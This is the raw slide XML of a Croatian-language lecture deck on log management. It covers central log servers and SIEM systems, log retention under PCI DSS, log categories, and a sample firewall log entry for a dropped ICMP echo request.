                </a:solidFill>
              </a:rPr>
              <a:t>Na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unixima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /var/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Centralni poslužitelji su obično specijalizirane aplikacije</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Npr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, ELK,…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pojedini sustavi ujedno i normaliziraju log zapise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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Analiza log zapisa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34818" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automatsko pregledavanje primljenih logova</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Izvještavanje</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uzbunjivanje</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vrlo kompleksni sustavi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SIEM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eng.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Information and Event Management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zadavanje kompleksnih pravila</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Korelacija logova iz različitih izvora</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strojno učenje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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS"/>
              <a:t>Arhiviranje i uklanjanje log zapisa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Resursi sustava za pohranjivanje su ograničeni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cijena brzih diskova</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Centralni sustavi obično troše još prostora na dodatne informacije</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Potrebno odrediti periode arhiviranja/brisanja</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U nekim slučajevima ovise o zakonskim odredbama</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PCI DSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="sr-Latn-RS" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.5.1 Retain audit log history for at least 12 months, with at least the most recent three months immediately available for analysis.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logovi se obično rotiraju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4AC6742-E74C-427A-A79D-CFA8DB5B6AE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>CIS G1 kontrole</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C80E9BC6-CAE9-9B2F-2D4C-9C8021E5D2D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="hr-HR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Slika 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD62B2B3-7C5C-431F-A968-AE4AA4DC08C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="32512" y="1825625"/>
            <a:ext cx="8798824" cy="3240360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131923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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS"/>
              <a:t>Tipovi log zapisa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36866" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dijelimo u tri osnovne kategorije:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sigurnosni, operacijski i aplikacijski zapisi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sigurnosni log zapisi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zapisi koji bilježe sigurnosne događaje sustava</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generiraju praktički svi uređaji i operacijski sustavi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zapisi prilikom prijave korisnika na sustav</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Autentikacijski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> logovi koji sadrže podatke o provjeri identiteta korisnika</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Autorizacijski logovi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS-ovi često zapisuju i druge bitne informacije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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Sigurnosni log zapisi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Log zapisi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>vatrozida</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Više kategorija, sve do aktivnosti administratora</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>loc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=289730 filename=fw.log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>fileid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=1263596341 time=16Jan2010 11:02:48 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=drop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>orig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=fw1 i/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>f_dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>inbound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> i/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>f_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=eth4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>has_accounting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>product</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=VPN-1 &amp; FireWall-1 __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>policy_id_tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>product</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=VPN-1 &amp; FireWall-1[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>db_tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>={356FCA32-B2DC-421F-B575-023A57533E7D};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>mgmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>cp-manager;date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=1263549944;policy_name=Standard_1] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>rule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=122 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>rule_uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>={4E0A7C38-22C9-410D-8987-E501A7D4EDA4} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>rule_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t>=Zabrana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>SmartDefense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> profile=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>Default_Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> ICMP=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>Echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=10.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=10.1.14.14 proto=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=8 ICMP Code=0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rtlCol="0">
